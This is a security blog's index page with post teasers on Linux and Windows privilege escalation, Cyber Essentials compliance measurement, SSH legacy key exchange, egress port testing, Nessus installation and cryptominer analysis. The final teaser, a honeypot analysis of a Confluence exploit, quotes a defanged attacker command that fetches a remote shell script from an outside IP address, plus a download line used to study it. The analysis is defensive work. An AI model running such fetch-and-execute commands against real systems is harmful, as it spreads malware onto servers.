Hacking

Linux Privilege Escalation

When you gain access to a target node you will want to explore, the exact method you use to do this will depend upon operational security considerations, time constraints and style. You will be looking for a range of elements to support progressing an objective.

It should be noted that the objective may NOT require elevation. You may be trying to obtain data and access might already be possible using the context you have assumed.

You also may need to move from a www-data user to a named user account or get to root level of access. If so there’s a range of questions we should be asking ourselves:

Read more “Linux Privilege Escalation”
Guides

Measuring Cyber Essentials: Windows Security Configuration

Measuring Compliance with standards is easy right?

Checking an environment configuration is one of those things where it’s easy to say and harder to do. If we take the cyber essentials standard and look at the requirements, they are quite different from say the CIS baselines. This alone makes for some fun, let’s investigate this further:

CIS baselines are based on a specific component e.g., Windows Server or Windows client and is contextually aware of roles: e.g., Domain Controller vs Member Server.

Is this registry key set?

Read more “Measuring Cyber Essentials: Windows Security Configuration”
Hacking

Priviledge Escalation Hunting – Scheduled Tasks and Scripts

TLDR: If you have been hunting for privescs before you will know it’s normally not a fast task, you will have a shed ton of data to look at. Sure WINPEAS is good but it’s not a silver bullet.

Here is a really small script which focuses on system administration files/scripts, scheduled tasks and scheduled task history to help you hunt for weaknesses:

Read more “Priviledge Escalation Hunting – Scheduled Tasks and Scripts”
Guides

SSH oh MY: no matching key exchange method found.…

Have you ever tried to SSH into a server and recieved the following error?

no matching key exchange method found. Their offer: diffie-hellman-group1-sha1

Well that’s probably becuase you are using a bit of kit with legacy software or firmware.

Then when you try to SSH and you add diffie-hellman-group1-sh1 you get the following back?

Read more “SSH oh MY: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1”
Education

Creating a tracker and dashboard for Cyber Essentials

I was talking to a friend about a requirement to “measure” cyber essentials compliance. Now if you know a thing or two about standards and applying standards to complex technology environments you might come up with:

  • Can’t we just script a checker?
  • Don’t we have all the audit data in the *checks notes* 1000 inventory systems we have?

Well sure, you could write a massive set of rules which ignore any context and try and cater for a huge number of different scenarios. You could use the Q&A approach as well (which is how the standard workbook works anyway so that already exists). But let’s say you are an IT manager, and you want to KNOW how your environment stacks up!

The question is simple, it’s easy to ask, look:

  • “How compliant are we against Cyber Essentials?”
Read more “Creating a tracker and dashboard for Cyber Essentials”
Guides

Testing Risky Egress Ports

Have you ever wanted to run a quick test of egress ports from userland from a windows machine?

Well worry not, I didn’t even have to write anything, the nice people at Black Hills security have done it for us. However I did decide that there’s a few other things we might want to do, so I made a quick modification, now we have colours, randomisation and some sleeps.

Read more “Testing Risky Egress Ports”
Education

Learn to SOC: Cryptominer Analysis

I’m totally in the middle of doing some work but this alert just came in so I have quickly dumped the data:

This came in via a Confluence exploit (not sure which CVE yet). I’ve not got time to analyse but thought I’d share this as an educational excercise for people! It’s a good excercise to see the apache tomcat logs and then decode, obtain samples and analyse the activity/imapct (as well as yoink IOCs etc.)

Read more “Learn to SOC: Cryptominer Analysis”
Education

Installing Nessus Pro on Kali Linux

You can deploy Nessus in a range of ways, from direct install through to using a cloud-based deployment or virtual appliance.

A common reason for deploying on Kali or other distro rather than using the virtual appliance is for mobility, ease of use but also you might want to VPN or proxy traffic.

The install process is simple, log into your account on tenable community portal and download the relevant installation package.

Read more “Installing Nessus Pro on Kali Linux”
Education

CVE-2022-26134 – Honeypot Payload Analysis Example

Threat actors are deploying a range of payloads to try and leverage vulnerable confluence servers around the globe. This just dropped into one of the pots:

HTTP Command Executes this: 

curl http[:]//202.28.229.174/ap[.]sh?confcurl

This download the following (ap.sh)

$stealz = wget -Uri http[:]//202.28.229[.]174/ap[.]sh?confcurl -UseBasicParsing

$stealz.Content | Out-File ap.txt
Read more “CVE-2022-26134 – Honeypot Payload Analysis Example”
Copyright (c) Xservus Limited